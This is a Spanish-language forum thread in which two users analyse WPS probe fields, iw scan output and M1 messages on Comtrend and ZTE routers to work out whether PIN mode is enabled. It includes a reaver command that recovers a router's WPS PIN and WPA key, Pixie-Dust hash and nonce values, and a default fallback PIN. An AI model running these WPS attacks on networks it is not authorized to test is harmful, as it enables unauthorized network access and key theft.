Además, la "R" indica que no es un parámetro opcional.
¿No sería más sencillo comprobar el valor de este campo para no lanzar un ataque contra un AP que si bien tiene el WPS habilitado, este no está configurado para soportar el método Label(Pin)?.
Un saludo.
Ultima edición por Patcher (19-01-2016 21:46:30)
Desconectado
#8 20-01-2016 13:10:24
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,730
Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
Hola parcher.
Unas palabras llenas de sabiduría y pertinencia... Como siempre.
En teoría deberías tener razón....
...¡Ojalá tendrías razón! : Hace tiempo intente hacer un escaneo para sustituir wash.
Al final no lo hice porque no logre el resultado que quería ya que no he conseguido hacer "un patrón" para interpretar correctamente lo que esta anunciado en los PROBES WPS. 
Ejemplo1; este router tiene el WPS PIN habilitado y funcionado: (mac 00:1A:2B - comtrend "n", viejo pero no tanto)
WPS: * Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* Selected Registrar: 0x0
* Response Type: 3 (AP)
* UUID: 4eedc249-3860-3c7f-c786-649b26ada5ae
* Manufacturer: Broadcom
* Model: Broadcom
* Model Number: 123456
* Serial Number: 1234
* Primary Device Type: 6-0050f204-1
* Device name: BroadcomAP
* Config methods: Display, PBCNo pone "label"
Ejemplo 2 : Este también tiene el WPS PIN funcionando (lo demuestra de cierto modo el hecho de que sea bloqueado ) , es un "voda"
WPS: * Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* AP setup locked: 0x01
* Response Type: 3 (AP)
* UUID: 50523378-af99-ee1f-8a03-b8e724637dc3
* Manufacturer: Broadcom
* Model: Broadcom
* Model Number: 123456
* Serial Number: 1234
* Primary Device Type: 6-0050f204-1
* Device name: BroadcomAP
* Config methods:
* RF Bands: 0x1
* Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20Esta vez no sale nada en "config method"
tercero ejemplo, aquí también el WPS en modo PIN funciona... essid tipo MOVISTAR_XXXX
WPS: * Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* UUID: bc329e00-1dd8-11b2-8601-e241363e3f90
* RF Bands: 0x1
* Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20A pesar de no ser opcional el TAG "config method" no esta siquiera presente.
cuarto ejemplo:
WPS: * Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* Response Type: 3 (AP)
* UUID: e7d4111a-0005-6320-514d-ef6d3d4b09da
* Manufacturer: Observa
* Model: BRA14NR
* Model Number: BRA14NR
* Serial Number: 96368GW
* Primary Device Type: 6-0050f204-1
* Device name: BRA14NR
* Config methods:
* RF Bands: 0x1
* Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20Observa, con PIN activado pero sin método indicado en "Config methods"
Ultimo ejemplo que pongo, el mas perturbador
WPS: * Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)Nada más... y el WPS en modo PIN funciona.
Lo que no he hecho es mirar en los M1,
Cuando intenté hacer mi cosita para escaneo WPS no se conocía pixiedust y no se me ha ocurrido mirar en los M1.
Haré unas pruebas pero algo me dice que si no lo anuncian en los PROBES no lo van a hacer en el M1....
Una pregunta: ¿Los documentos que pusiste salen de la documentación de la wifi-alliance sobre el WPS?
Saludetes
Desconectado
#9 20-01-2016 17:30:56
- Patcher
- waircut
- Registrado: 14-01-2016
- Mensajes: 656
Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
Si, la información fue extraída de Wi-Fi Protected Setup Specification 1.0h.
Vayamos por partes, el campo de información es opcional en los Beacon pero no en los probe ni en el M1, almenos eso es lo indicado en la expecificación WPS donde se indica que se trata de un campo Requerido.
WPS:* Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* Selected Registrar: 0x0
* Response Type: 3 (AP)
* UUID: 4eedc249-3860-3c7f-c786-649b26ada5ae
* Manufacturer: Broadcom
* Model: Broadcom
* Model Number: 123456
* Serial Number: 1234
* Primary Device Type: 6-0050f204-1
* Device name: BroadcomAP
* Config methods: Display, PBCSi te fijas, el modo configurado es Display y no label, como tu bien indicas.
En conclusión, el metodo pín no está activado. Este es un caso claro.
WPS:* Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* AP setup locked: 0x01
* Response Type: 3 (AP)
* UUID: 50523378-af99-ee1f-8a03-b8e724637dc3
* Manufacturer: Broadcom
* Model: Broadcom
* Model Number: 123456
* Serial Number: 1234
* Primary Device Type: 6-0050f204-1
* Device name: BroadcomAP
* Config methods:
* RF Bands: 0x1
* Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20En este el AP está bloqueado y por tanto tampoco tiene sentido intentar conectar. En cualquier caso debería indicar los modos de configuración y para ello me remito a la justificación que doy al último de tus ejemplos y que es igual a este salvo porque el AP en ese caso no está bloqueado.
WPS:* Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* UUID: bc329e00-1dd8-11b2-8601-e241363e3f90
* RF Bands: 0x1
* Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20WPS:* Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)Podrían corresponder a un Beacon y no a un probe, fíjate que no contienen el campo "Response Type" (Requerido en un probe). La información de ambos frames, beacon y probes, es muy similar.
WPS:* Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* Response Type: 3 (AP)
* UUID: e7d4111a-0005-6320-514d-ef6d3d4b09da
* Manufacturer: Observa
* Model: BRA14NR
* Model Number: BRA14NR
* Serial Number: 96368GW
* Primary Device Type: 6-0050f204-1
* Device name: BRA14NR
* Config methods:
* RF Bands: 0x1
* Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20Lo que me extraña en este caso, al igual que en el comentado anteriormente, es que contenga el campo "Config methods", lo cual indica que está recibiendo el TLV(Por tanto el AP sí lo anuncia), y que este esté vacío. ¿Con que herramienta estas capturando esta información?, ¿Podría suceder que no la esté imprimiendo correctamente? . Para salir de dudas habría que analizar el frame en RAW, la cadena binaria capturada. Me decanto por un fallo en la impresión de la información.
Como ves no me rindo así como así .
Un saludo.
Ultima edición por Patcher (20-01-2016 17:44:38)
Desconectado
#10 20-01-2016 22:13:01
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,730
Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
Sobre este caso :
WPS:* Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* Selected Registrar: 0x0
* Response Type: 3 (AP)
* UUID: 4eedc249-3860-3c7f-c786-649b26ada5ae
* Manufacturer: Broadcom
* Model: Broadcom
* Model Number: 123456
* Serial Number: 1234
* Primary Device Type: 6-0050f204-1
* Device name: BroadcomAP
* Config methods: Display, PBCComo dices no sale "label" por lo tanto concluyes - lógicamente - que el método PIN no esta activado...
Pues... esta activado.
Es un Comtrend WAP-5813n (algo viejo) soportado por WPSPIN con PINes genéricos con la configuración por defecto
Aquí puedes ver la salida entera :
BSS 00:1a:2b:b0:23:90(on wlan0)
TSF: 48916603511 usec (0d, 13:35:16)
freq: 2462
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -72.00 dBm
last seen: 604 ms ago
Information elements from Probe Response frame:
SSID: WLAN_F492
Supported rates: 1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0
DS Parameter set: channel 11
ERP: <no flags>
ERP D4.0: <no flags>
Extended supported rates: 6.0 9.0 12.0 48.0
HT capabilities:
Capabilities: 0x186c
HT20
SM Power Save disabled
RX HT20 SGI
RX HT40 SGI
No RX STBC
Max AMSDU length: 7935 bytes
DSSS/CCK HT40
Maximum RX AMPDU length 65535 bytes (exponent: 0x003)
Minimum RX AMPDU time spacing: 8 usec (0x06)
HT RX MCS rate indexes supported: 0-15
HT TX MCS rate indexes are undefined
HT operation:
* primary channel: 11
* secondary channel offset: no secondary
* STA channel width: 20 MHz
* RIFS: 1
* HT protection: no
* non-GF present: 1
* OBSS non-GF present: 0
* dual beacon: 0
* dual CTS protection: 0
* STBC beacon: 0
* L-SIG TXOP Prot: 0
* PCO active: 0
* PCO phase: 0
WPS: * Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* Selected Registrar: 0x0
* Response Type: 3 (AP)
* UUID: 4eedc249-3860-3c7f-c786-649b26ada5ae
* Manufacturer: Broadcom
* Model: Broadcom
* Model Number: 123456
* Serial Number: 1234
* Primary Device Type: 6-0050f204-1
* Device name: BroadcomAP
* Config methods: Display, PBC
WPA: * Version: 1
* Group cipher: TKIP
* Pairwise ciphers: CCMP TKIP
* Authentication suites: PSK
* Capabilities: 16-PTKSA-RC 1-GTKSA-RC (0x000c)
WMM: * Parameter version 1
* u-APSD
* BE: CW 15-1023, AIFSN 3
* BK: CW 15-1023, AIFSN 7
* VI: CW 7-15, AIFSN 2, TXOP 3008 usec
* VO: CW 3-7, AIFSN 2, TXOP 1504 usecY aquí reaver lo tumba en un instante :
kcdtv@pr0fesoraBubbleVanAppletrudell:~$ sudo reaver -i wlan0mon -p 77775078 -b 00:1A:2B:B0:23:90 -vv -n -g 1 -c 11
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg
[+] Switching wlan0mon to channel 11
[+] Waiting for beacon from 00:1A:2B:B0:23:90
[+] Associated with 00:1A:2B:B0:23:90 (ESSID: WLAN_F492)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 1
[+] Trying pin 77775078.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 5 seconds
[+] WPS PIN: '77775078'
[+] WPA PSK: 'bd8565af3d05d3e8a559'
[+] AP SSID: 'WLAN_F492'
[+] Nothing done, nothing to save.Fíjate en el essid y la mac, no hay confusión : Es este.
¿Con que herramienta estas capturando esta información?, ¿Podría suceder que no la esté imprimiendo correctamente? . Para salir de dudas habría que analizar el frame en RAW, la cadena binaria capturada. Me decanto por un fallo en la impresión de la información.
Lo he hecho rápido con iw scan
Es un escaneo pasivo que puede resultar incompleto y puede explicar efectivamente porque tengo una salida así :
WPS:* Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)Aunque suele indicar que ha tenido un problema si pasa algo con el TLV
ejemplo :
WPS: * Version: 1.0[img]https://www.wifi-libre.com/img/members/3/ZTEpixiestrange.jpg[/img]
* Wi-Fi Protected Setup State: 2 (Configured)
* RF Bands: 0x1
* Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20Mejor fijarse en el caso del comtrend por el cual no hay dudas sobre el hecho de que las condiciones están perfectas y no influyen en el resultado.
Voy a capturar el trafico haciendo un ataque WPS para examinar lo que dice el M1...
lo mismo : Display y PBC pero no "label"
Aquí dejo el *.pcap por si quieres echarle un ojo : WPS_Comtrend.pcap
Como ves no me rindo así como así smile.
Yo me había rendido pero como te veo con ganas me animo... A ver si podemos encontrar la forma de determinar si el mode PIN esta habilitado o no.
Desconectado
#11 21-01-2016 18:03:44
- Patcher
- waircut
- Registrado: 14-01-2016
- Mensajes: 656
Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
Tienes toda la razón , no me había fijado en que a ese si pudiste conectar .
He visto el fichero de captura y la información del config method sólo figura en el M1. Ahondando un poco más, he revisado el manual del router, está muy bien detallado el proceso de configuración WPS y cuando se activa el modo PIN, este se pude generar de forma aleatoria o puede introducirlo el usuario de forma manual. Quizás sea ese el motivo del porque el AP publica el modo Display en lugar de Label.
Fijaros además en estos extractos de la especificación WPS:
Realmente ambos modos trabajan igual, el label está pensado para los equipos que llevan normalmente el pin en la etiqueta de fabricante y el Display para los dispositivos que muestran el PIN en un Display, pero el proceso de identificación es el mismo en ambos casos. Podríamos considerar que serian validos todos aquellos AP que publiquen tanto el modo Label como el Display.
En el mismo fichero de captura también he visto que figura el campo "Device password ID", este es otro de los que la norma especifica como requeridos para un paquete M1.
Lo cual nos da una pista ineludible de que el pin está activado.
Habría que hacer un estudio más amplio y fijarse sobre todo en los paquetes M1, creo que por aquí pueden ir los tiros. A ver si en unos días puedo hacer un scan amplio y publicar algún resultado más conciso.
Un saludo.
Ultima edición por Patcher (21-01-2016 18:05:30)
Desconectado
#12 21-01-2016 20:38:09
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,730
Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
Como ves no me rindo así como así smile.
¡Ya lo veo! 
Mañana tendré tiempo para investigar esto... ¡Me parece que el asunto esta muy bien encarrilado!.
Desconectado
#13 27-01-2017 22:49:34
- Patcher
- waircut
- Registrado: 14-01-2016
- Mensajes: 656
Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
Ya no recordaba este post y casualmente me he topado con tu misma situación con un AP similar al tuyo.
Y aquí la repetición de los EHAS1 y 2
[P] AuthKey: 31:9C:C0:9F:0B:EF:28:FA:CD:CE:3F:58:2D:67:FA:50:D2:8E:CB:2A:17:1F:DC:F4:80:AD:70:EF:6B:11:FB:89
[P] PKE: D0:14:1B:15:65:6E:96:B8:5F:CE:AD:2E:8E:76:33:0D:2B:1A:C1:57:6B:B0:26:E7:A3:28:C0:E1:BA:F8:CF:91....
[P] PKR: 24:70:CD:EA:0B:21:56:95:A7:21:9E:51:90:73:C6:1A:94:38:68:6C:80:CD:8D:E0:86:AC:6E:39:C4:46:E8:BD....
[P] E-HASH1: 83:43:A1:28:4B:CC:42:AB:1C:32:6A:F2:E0:A5:1A:3D:02:FB:0E:06:62:F6:21:89:E8:F9:D1:08:89:D9:9B:68
[P] E-HASH2: 83:43:A1:28:4B:CC:42:AB:1C:32:6A:F2:E0:A5:1A:3D:02:FB:0E:06:62:F6:21:89:E8:F9:D1:08:89:D9:9B:68
[P] E-NONCE: 21:88:53:DE:3E:A6:AB:D1:42:7A:E8:96:6F:AD:F6:6C
[P] R-NONCE: 27:78:47:04:03:56:9C:7C:75:B2:B2:FA:F9:66:0D:C4Hasta aquí confirmo lo observado por ti, solo que en mi caso este AP solo tiene configurado el modo PUSHBUTTON y por tanto la prueba no es del todo valida.
Esto no dejaría de ser una anécdota si no fuera porque también me encontré con este otro caso y que fue en realidad el que me hizo recordar este hilo, solo que también es un ZTE pero no se trata del mismo modelo ni de la misma operadora.
Siempre responde así independientemente del pin probado, no debería pasar de M3 pero siempre llega a enviar hasta el M5, a excepción de cuando se trata del pin correcto en cuyo casó el intercambio de credenciales se completa con éxito.
Lo que yo creo es que no se trata de una mala implementación del protocolo WPS sino que está echo a posta para evitar los ataques de fuerza bruta. Como siempre responde hasta el M5, no se puede determinar cuando se ha descubierto la primera mitad del Pin, por lo que el ataque no se puede completar, por que todas las herramientas fallarían al interpretar erróneamente, que la primera mitad del pin es correcta.
Lo que no tiene sentido es hacer esto y no cambiar el pin por defecto, además de que este router en concreto también es vulnerable a aún ataque Pixie-Dust.
Ultima edición por Patcher (27-01-2017 23:03:41)
Desconectado
#14 28-01-2017 14:18:55
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,730
Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
Lo que no tiene sentido es hacer esto y no cambiar el pin por defecto, además de que este router en concreto también es vulnerable a aún ataque Pixie-Dust.
Es qué con esto lo dices todo (para mi).
Sobre todo que 12345670 es el PIN "fall back" del WPS.
El qué se usa cuando no hay un PIN configurado correctamente.
Este caso (fake M5 sistemático) Coeman76 y yo nos lo habíamos encontrado en un ZTE jazztell (cada uno de su lado) a la época cuando todos eran activados con PIN 12345670.
Nunca lo ví en un routeur que no sea ZTE y que no tenga PIN 12345670 (y hasta hoy que no sea de jazztell)...
Esto me da a pensar de mi lado que no se trata de un estrategia compleja (que sería absurda dejando el PIN 12345670 cómo PIN genérico) sino de una programación deficiente.
En su tiempo lo hemos visto en un par de AP sobre miles y miles...
El debate apasionado sobre el WPS sobrenatural está abierto...
Desconectado
Temas similares
| Tema | Respuestas | Vistas | Ultimo mensaje |
|---|---|---|---|
|
¡Vienen grandes cambios! por Takomou
|
2 | 169 | Hoy 15:25:52 por Patcher |
|
Pegado: |
521 | 339996 | 10-05-2023 18:24:28 por Betis-Jesus |
|
|
27 | 1242 | 09-05-2023 21:32:44 por kcdtv |
|
Hacktivismo por CHARGER22
|
1 | 205 | 08-05-2023 19:53:26 por kcdtv |
|
Pegado: |
447 | 66090 | 22-04-2023 15:31:13 por kcdtv |
Información del usuario
Ultimo usuario registrado: klurosu
Usuarios registrados conectados: 0
Invitados conectados: 15
Estadisticas de los foros
Número total de usuarios registrados: 2,446
Número total de temas: 1,637
Número total de mensajes: 15,586
Atom tema feed - Impulsado por FluxBB
© 2014-2022 Wifi-libre.com - [ Generated in 0.035 seconds ]